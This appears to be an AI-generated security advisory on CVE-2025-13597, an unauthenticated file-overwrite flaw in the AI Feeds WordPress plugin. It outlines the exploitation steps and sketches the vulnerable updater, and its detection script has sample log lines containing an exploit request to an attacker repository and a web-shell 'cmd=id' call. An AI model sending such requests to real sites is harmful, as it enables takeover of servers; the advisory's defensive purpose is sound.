CVE-2025-13597 Overview
The AI Feeds plugin for WordPress contains a critical arbitrary file upload vulnerability caused by a missing capability check in the plugin's actualizador_git.php file. All versions up to and including 1.0.11 are affected. Because the file can be invoked without any authentication, an attacker can make the plugin download an arbitrary GitHub repository and write its contents over the plugin's own files on the server, which can lead to remote code execution.
Critical Impact
An unauthenticated attacker can point the updater at an attacker-controlled GitHub repository. The plugin fetches the repository and overwrites its own server-side files with the contents, so any PHP file placed in that repository becomes executable on the target and can be invoked by a follow-up request.
Affected Products
- WordPress AI Feeds plugin versions up to and including 1.0.11
- WordPress installations with the vulnerable AI Feeds plugin installed
- Web servers hosting affected WordPress sites
Discovery Timeline
- 2025-11-25 - CVE-2025-13597 published to NVD
- 2025-12-01 - Last updated in NVD database
Technical Details for CVE-2025-13597
Vulnerability Analysis
The CVE is classified as CWE-434 (Unrestricted Upload of File with Dangerous Type). The defect that enables it is an authorization gap: actualizador_git.php performs no authentication or capability check before running, so any external request can trigger a GitHub repository download and have the result written over existing plugin files on the WordPress server.
Exploitation is remote, over the network, with no authentication and no user interaction. A successful attack compromises the confidentiality, integrity and availability of the site: the attacker's PHP executes with the privileges of the PHP interpreter, which on most deployments is the web server's service account, and therefore gets the same file system and database access the site itself has.
Root Cause
The vulnerability exists because actualizador_git.php can be requested directly and does not call WordPress's capability checks (for example current_user_can()) to confirm that the requester is allowed to perform file operations. A file reached this way runs outside the authenticated admin flow, so WordPress's built-in permission system and nonce protection never apply, and any unauthenticated visitor can invoke the functionality it exposes.
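The page does not reproduce the plugin's source, so the following is an added illustration written for this page, not the AI Feeds plugin's own code. Part A sketches the defect class described above (a directly reachable updater file that bootstraps WordPress itself, takes the repository from the request and checks nothing); Part B shows how the same updater is gated in a WordPress plugin with an admin-post hook, a capability check, a nonce, a pinned download source and staged extraction. The plugin slug "example-feeds", the function names, the pinned URL and the expected hash are placeholders.

```php
<?php
/**
 * Added illustration for this page; it is NOT the AI Feeds plugin's source.
 * Slug "example-feeds", function names, the pinned URL and the SHA-256 below
 * are hypothetical placeholders.
 */

/* ---------- Part A: vulnerable shape (hypothetical, kept in a comment) ----------
 * A file like /wp-content/plugins/example-feeds/updater.php that is fetched
 * directly over HTTP. It loads WordPress itself, so no login, capability or
 * nonce check ever runs, and the repository comes straight from the request:
 *
 *   require_once dirname( __DIR__, 3 ) . '/wp-load.php';
 *   require_once ABSPATH . 'wp-admin/includes/file.php';
 *   WP_Filesystem();
 *   $zip = download_url( $_GET['repo'] . '/archive/refs/heads/main.zip' );
 *   unzip_file( $zip, __DIR__ );   // attacker's repository overwrites this plugin's files
 * ------------------------------------------------------------------------------- */

/* ---------- Part B: hardened handler (this file is loaded by the plugin) ---------- */
if ( ! defined( 'ABSPATH' ) ) {
    exit; // a direct HTTP request to this file gets nothing
}

// Pinned source and expected archive hash. Hypothetical values: in practice they are
// shipped by the plugin author with each release, never taken from the request.
const EXAMPLE_FEEDS_SOURCE_ZIP    = 'https://github.com/example-org/example-feeds/archive/refs/tags/v1.0.12.zip';
const EXAMPLE_FEEDS_SOURCE_SHA256 = '0000000000000000000000000000000000000000000000000000000000000000';

// The entry point is admin-post.php, so WordPress authenticates the session before
// our code runs; there is no URL an anonymous visitor can hit to reach the handler.
add_action( 'admin_post_example_feeds_git_update', 'example_feeds_handle_git_update' );

// URL for the "Update from GitHub" button in the admin UI. The nonce embedded here is
// what check_admin_referer() verifies in the handler.
function example_feeds_update_button_url() {
    return wp_nonce_url(
        admin_url( 'admin-post.php?action=example_feeds_git_update' ),
        'example_feeds_git_update'
    );
}

function example_feeds_handle_git_update() {
    // Capability check: the control the advisory says is missing. Only users who may
    // update plugins can proceed; everyone else gets a 403.
    if ( ! current_user_can( 'update_plugins' ) ) {
        wp_die( 'You are not allowed to update this plugin.', '', array( 'response' => 403 ) );
    }
    // CSRF check: the request must carry the nonce issued by example_feeds_update_button_url().
    check_admin_referer( 'example_feeds_git_update' );

    require_once ABSPATH . 'wp-admin/includes/file.php';
    if ( ! WP_Filesystem() ) {
        wp_die( 'Could not initialise the WordPress filesystem API.' );
    }

    // The repository is fixed in code, never read from $_GET or $_POST.
    $tmp_zip = download_url( EXAMPLE_FEEDS_SOURCE_ZIP );
    if ( is_wp_error( $tmp_zip ) ) {
        wp_die( esc_html( $tmp_zip->get_error_message() ) );
    }

    // Supply-chain check: refuse any archive that does not match the pinned hash, so a
    // tampered or moved upstream cannot push code onto the site.
    if ( ! hash_equals( EXAMPLE_FEEDS_SOURCE_SHA256, hash_file( 'sha256', $tmp_zip ) ) ) {
        unlink( $tmp_zip );
        wp_die( 'Downloaded archive does not match the expected hash; aborting.' );
    }

    // Extract into a fresh staging directory, never straight over the live plugin files.
    $staging = trailingslashit( get_temp_dir() ) . 'example-feeds-' . wp_generate_password( 12, false );
    $result  = unzip_file( $tmp_zip, $staging );
    unlink( $tmp_zip );
    if ( is_wp_error( $result ) ) {
        wp_die( esc_html( $result->get_error_message() ) );
    }

    // Validating the staged tree and moving it into place is the plugin's normal install
    // logic; the point of this handler is that nothing above can be reached anonymously.
    wp_safe_redirect( add_query_arg( 'example_feeds_updated', '1', admin_url( 'plugins.php' ) ) );
    exit;
}
```

The order matters: the capability check comes before the nonce check (so an anonymous request is rejected with a 403 rather than a nonce error), and both come before any network or file system activity. Routing through admin-post.php also means the file can carry the ABSPATH guard at the top, which is what turns a directly reachable script into one that only WordPress can execute.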
Attack Vector
The attack is network-based and requires no authentication or user interaction. An attacker can craft requests to the vulnerable actualizador_git.php endpoint, specifying a malicious GitHub repository URL. The plugin then downloads the contents of this repository and overwrites files within the plugin directory structure. By hosting a specially crafted repository containing malicious PHP files, an attacker can achieve arbitrary code execution on the target WordPress server.
The exploitation flow involves:
- Identifying a WordPress site with the vulnerable AI Feeds plugin installed
- Sending a crafted request to the actualizador_git.php endpoint with a malicious GitHub repository URL
- The plugin downloads and extracts the repository contents, overwriting existing plugin files
- The attacker then triggers execution of the malicious PHP code by accessing the overwritten files
For detailed technical analysis, refer to the Ryan Kozak Analysis and the GitHub PoC Repository.
Detection Methods for CVE-2025-13597
Indicators of Compromise
- Unexpected HTTP requests to /wp-content/plugins/ai-feeds/actualizador_git.php from external sources
- Modified plugin files within the AI Feeds plugin directory with recent timestamps
- Web server logs showing requests containing GitHub repository URLs targeting the vulnerable endpoint
- Presence of unknown PHP files or modified existing files in the ai-feeds plugin directory
Detection Strategies
- Monitor web server access logs for requests to actualizador_git.php, and treat any request whose parameters contain a GitHub URL or repository reference, or any POST to the file, as a probable exploitation attempt
- Implement file integrity monitoring on the WordPress wp-content/plugins/ directory (a baseline of file hashes compared on a schedule) to detect unauthorized modifications
- Deploy Web Application Firewall (WAF) rules that block requests to the vulnerable endpoint; a WAF cannot distinguish an unauthenticated request from an authenticated one for a file that sits outside WordPress's login flow, so blocking the path outright is the practical rule
- Review WordPress plugin directories for files with unexpected modification dates or unknown origins
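The two detection strategies above (log review and file integrity checking) as an added example written for this page, not code from the advisory or the plugin. scan_access_log() parses combined-format access-log lines, flags hits on the vulnerable endpoint, grades them by whether the query carries a GitHub URL (or the request is a POST whose body the log cannot show), and also flags direct requests to other PHP files under the plugin directory, which is how a dropped file would be executed. manifest_diff() compares a plugin directory against a known-good manifest of SHA-256 hashes. The log lines, the baseline manifest and the temporary plugin directory are constructed sample data; the plugin path follows the one used elsewhere on this page.

```php
<?php
/**
 * Added example for this page (not the plugin's or the advisory's code).
 *   1. scan_access_log(): grade hits on actualizador_git.php in combined-format log lines.
 *   2. manifest_diff(): compare a plugin directory against a known-good SHA-256 manifest.
 * The log lines, baseline manifest and temp directory below are constructed sample data.
 */

const PLUGIN_DIR_URL = '/wp-content/plugins/ai-feeds/';
const VULN_ENDPOINT  = PLUGIN_DIR_URL . 'actualizador_git.php';
// Combined log format: host ident user [time] "method target proto" status bytes "referer" "agent"
const LOG_RE = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"$/';

function scan_access_log( array $lines ): array {
    $findings = array();
    foreach ( $lines as $line ) {
        if ( ! preg_match( LOG_RE, $line, $m ) ) {
            continue; // not a combined-format line; skip rather than guess
        }
        list( , $ip, $time, $method, $target, $status, $agent ) = $m;
        $path  = parse_url( $target, PHP_URL_PATH );
        $query = urldecode( parse_url( $target, PHP_URL_QUERY ) ?? '' );

        if ( $path === VULN_ENDPOINT ) {
            // Every hit on the endpoint deserves a look. A GitHub URL in the query, or a
            // POST whose body is not in the log, matches the exploit shape described above.
            $grade = ( stripos( $query, 'github.com' ) !== false || $method === 'POST' )
                ? 'likely-exploit' : 'probe';
            if ( $grade === 'likely-exploit' && $status[0] === '2' ) {
                $grade .= '-succeeded'; // 2xx response: the download path was reached
            }
        } elseif ( strpos( $path, PLUGIN_DIR_URL ) === 0 && substr( $path, -4 ) === '.php' ) {
            // Heuristic: direct requests to other PHP files in the plugin are how an
            // attacker executes files the repository download dropped.
            $grade = 'follow-up-php-access';
        } else {
            continue;
        }
        $findings[] = compact( 'ip', 'time', 'method', 'path', 'query', 'status', 'agent', 'grade' );
    }
    return $findings;
}

// $baseline maps relative path => sha256 of the known-good file (take it from a fresh
// copy of the same plugin version, or record it right after a clean install).
function manifest_diff( string $dir, array $baseline ): array {
    $current = array();
    $iter = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator( $dir, FilesystemIterator::SKIP_DOTS )
    );
    foreach ( $iter as $file ) {
        $rel = ltrim( substr( $file->getPathname(), strlen( $dir ) ), '/\\' );
        $current[ $rel ] = hash_file( 'sha256', $file->getPathname() );
    }
    $modified = array();
    foreach ( $baseline as $rel => $sha ) {
        if ( isset( $current[ $rel ] ) && ! hash_equals( $sha, $current[ $rel ] ) ) {
            $modified[] = $rel;
        }
    }
    return array(
        'modified' => $modified,
        'added'    => array_values( array_diff( array_keys( $current ), array_keys( $baseline ) ) ),
        'missing'  => array_values( array_diff( array_keys( $baseline ), array_keys( $current ) ) ),
    );
}

// ---- Constructed sample log: one exploit-shaped hit, one follow-up, one bare probe, one unrelated line
$sample_log = array(
    '203.0.113.7 - - [26/Nov/2025:10:15:02 +0000] "GET ' . VULN_ENDPOINT . '?repo=https%3A%2F%2Fgithub.com%2Fattacker%2Fpayload HTTP/1.1" 200 512 "-" "python-requests/2.32"',
    '203.0.113.7 - - [26/Nov/2025:10:15:09 +0000] "GET ' . PLUGIN_DIR_URL . 'shell.php?cmd=id HTTP/1.1" 200 77 "-" "python-requests/2.32"',
    '198.51.100.4 - - [26/Nov/2025:10:20:00 +0000] "GET ' . VULN_ENDPOINT . ' HTTP/1.1" 200 120 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [26/Nov/2025:10:21:00 +0000] "GET /index.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
);
foreach ( scan_access_log( $sample_log ) as $f ) {
    printf( "%-24s %-15s %s %s -> %s\n", $f['grade'], $f['ip'], $f['method'], $f['path'], $f['status'] );
}

// ---- Constructed plugin directory: one tampered file, one dropped file, one file missing
$dir = sys_get_temp_dir() . '/ai-feeds-demo-' . getmypid();
mkdir( $dir );
file_put_contents( $dir . '/ai-feeds.php', "<?php // tampered main file\n" );
file_put_contents( $dir . '/shell.php', "<?php // dropped by attacker\n" );
$baseline = array(
    'ai-feeds.php' => hash( 'sha256', "<?php // original main file\n" ),
    'readme.txt'   => hash( 'sha256', "placeholder\n" ),
);
print_r( manifest_diff( $dir, $baseline ) );
array_map( 'unlink', glob( $dir . '/*' ) );
rmdir( $dir );
```

Run it with php on the host, or feed real lines into scan_access_log() from the web server's access log. The bare probe grade is deliberately noisy: legitimate administrators may also request the updater, so correlate those hits with an admin session before escalating, while a GitHub URL in the query string from an address that never logged in is the pattern to page on.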
Monitoring Recommendations
- Enable detailed logging for the WordPress installation and web server
- Configure alerts for any file changes within plugin directories
- Monitor outbound connections from the web server to GitHub; legitimate plugin and theme updates may also reach GitHub, so baseline normal update traffic and alert on connections that do not coincide with an administrator-initiated update
- Implement real-time threat detection solutions to identify post-exploitation activity
How to Mitigate CVE-2025-13597
Immediate Actions Required
- Update the AI Feeds plugin to a fixed release (any version later than 1.0.11) as soon as one is published
- Until a fixed release is available, deactivate and delete the AI Feeds plugin; because the vulnerable file is requested directly over HTTP, deactivating without deleting may leave it reachable
- Audit all files in the wp-content/plugins/ai-feeds/ directory for unauthorized modifications, comparing against a fresh copy of the same plugin version where possible
- Review server logs for evidence of prior exploitation attempts
- If tampering is confirmed, treat the site as compromised rather than only restoring plugin files: the attacker may have placed files outside the plugin directory, so rebuild from a known-good backup and rotate the WordPress and database credentials
Patch Information
A security patch addressing this vulnerability is tracked in the WordPress Change Review. Administrators should update to the patched version as soon as it becomes available through the WordPress plugin repository. Additional details can be found in the Wordfence Vulnerability Report.
Workarounds
- Remove or rename the actualizador_git.php file to prevent exploitation (this may break the plugin's update functionality, but it closes the hole until a fix ships)
- Implement server-level access controls to restrict access to the vulnerable file
- On Apache, use .htaccess rules (the directory must have AllowOverride enabled for them to take effect) to deny direct requests to actualizador_git.php; on other servers such as nginx, apply the equivalent location-level deny rule in the server configuration
- Deploy a Web Application Firewall with rules that block requests to the plugin directory carrying GitHub repository URLs
# Apache .htaccess workaround: deny all direct requests to the vulnerable file.
# "Require all denied" is the Apache 2.4 syntax; the Order/Deny pair is kept for 2.2.
<Files "actualizador_git.php">
  <IfModule mod_authz_core.c>
    Require all denied
  </IfModule>
  <IfModule !mod_authz_core.c>
    Order Allow,Deny
    Deny from all
  </IfModule>
</Files>
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

